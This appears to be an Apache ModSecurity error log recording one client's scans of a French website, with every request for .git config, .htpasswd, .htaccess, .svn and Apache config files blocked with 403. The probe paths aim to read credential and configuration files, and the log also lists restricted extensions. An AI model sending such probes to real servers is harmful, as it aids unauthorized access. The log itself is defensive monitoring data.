[Mon May 11 12:34:40.035179 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:13336] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /vue/.git/config2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vue/.git/config2024"] [unique_id "agGwwJkIEwRJMyDaV55dnAAAAVg"]
[Mon May 11 12:34:40.035386 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:13336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vue/.git/config2024"] [unique_id "agGwwJkIEwRJMyDaV55dnAAAAVg"]
[Mon May 11 12:34:41.189905 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:13336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwwJkIEwRJMyDaV55dnAAAAVg"]
[Mon May 11 12:34:41.216726 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:13342] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /vue/.git/config2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vue/.git/config2024"] [unique_id "agGwwZkIEwRJMyDaV55dngAAAUQ"]
[Mon May 11 12:34:41.216936 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:13342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vue/.git/config2024"] [unique_id "agGwwZkIEwRJMyDaV55dngAAAUQ"]
[Mon May 11 12:34:42.436432 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:13342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwwZkIEwRJMyDaV55dngAAAUQ"]
[Mon May 11 12:34:56.129032 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:10586] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agGw0L4KNmD_mZ_vlf9JDwAAAFg"]
[Mon May 11 12:34:56.129810 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:10586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agGw0L4KNmD_mZ_vlf9JDwAAAFg"]
[Mon May 11 12:34:57.300406 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:10586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw0L4KNmD_mZ_vlf9JDwAAAFg"]
[Mon May 11 12:34:57.326066 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:10600] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agGw0b4KNmD_mZ_vlf9JFQAAAEQ"]
[Mon May 11 12:34:57.326549 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:10600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agGw0b4KNmD_mZ_vlf9JFQAAAEQ"]
[Mon May 11 12:34:58.564536 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:10600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw0b4KNmD_mZ_vlf9JFQAAAEQ"]
[Mon May 11 12:35:20.680553 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:24648] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /.htaccess-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htaccess-update"] [unique_id "agGw6GS6k_SCYd1AVZq-8wAAAQM"]
[Mon May 11 12:35:20.681020 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:24648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htaccess-update"] [unique_id "agGw6GS6k_SCYd1AVZq-8wAAAQM"]
[Mon May 11 12:35:21.859577 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:24648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw6GS6k_SCYd1AVZq-8wAAAQM"]
[Mon May 11 12:35:21.886878 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:24664] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /.htaccess-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htaccess-update"] [unique_id "agGw6WS6k_SCYd1AVZq-9AAAAQ8"]
[Mon May 11 12:35:21.887424 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:24664] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htaccess-update"] [unique_id "agGw6WS6k_SCYd1AVZq-9AAAAQ8"]
[Mon May 11 12:35:23.106166 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:24664] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw6WS6k_SCYd1AVZq-9AAAAQ8"]
[Mon May 11 12:35:23.131295 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:65378] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd-fix"] [unique_id "agGw6xjZymfuKpjWXeiMIQAAAM8"]
[Mon May 11 12:35:23.131501 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:65378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd-fix"] [unique_id "agGw6xjZymfuKpjWXeiMIQAAAM8"]
[Mon May 11 12:35:24.360926 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:65378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw6xjZymfuKpjWXeiMIQAAAM8"]
[Mon May 11 12:35:24.387374 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:65384] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd-fix"] [unique_id "agGw7GS6k_SCYd1AVZq-9gAAAQY"]
[Mon May 11 12:35:24.387542 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:65384] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd-fix"] [unique_id "agGw7GS6k_SCYd1AVZq-9gAAAQY"]
[Mon May 11 12:35:25.628429 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:65384] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw7GS6k_SCYd1AVZq-9gAAAQY"]
[Mon May 11 12:35:25.654111 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:65388] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd.disabled"] [unique_id "agGw7URdw2n9wv6Ai48XEgAAAIk"]
[Mon May 11 12:35:25.654273 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:65388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd.disabled"] [unique_id "agGw7URdw2n9wv6Ai48XEgAAAIk"]
[Mon May 11 12:35:27.817177 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:65388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw7URdw2n9wv6Ai48XEgAAAIk"]
[Mon May 11 12:35:27.843770 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:65400] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd.disabled"] [unique_id "agGw774KNmD_mZ_vlf9JfQAAAEY"]
[Mon May 11 12:35:27.844322 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:65400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd.disabled"] [unique_id "agGw774KNmD_mZ_vlf9JfQAAAEY"]
[Mon May 11 12:35:29.052822 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:65400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw774KNmD_mZ_vlf9JfQAAAEY"]
[Mon May 11 12:35:29.078540 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:65410] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd2024"] [unique_id "agGw8WS6k_SCYd1AVZq-_AAAAQw"]
[Mon May 11 12:35:29.078693 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:65410] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd2024"] [unique_id "agGw8WS6k_SCYd1AVZq-_AAAAQw"]
[Mon May 11 12:35:30.238415 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:65410] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw8WS6k_SCYd1AVZq-_AAAAQw"]
[Mon May 11 12:35:30.264768 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:65422] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd2024"] [unique_id "agGw8kRdw2n9wv6Ai48XFwAAAJU"]
[Mon May 11 12:35:30.264979 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:65422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd2024"] [unique_id "agGw8kRdw2n9wv6Ai48XFwAAAJU"]
[Mon May 11 12:35:31.461586 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:65422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGw8kRdw2n9wv6Ai48XFwAAAJU"]
[Mon May 11 12:35:58.147774 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:40770] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/composer.json-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.svn/composer.json-update"] [unique_id "agGxDkYQeUtAPynIs6xobwAAAAw"]
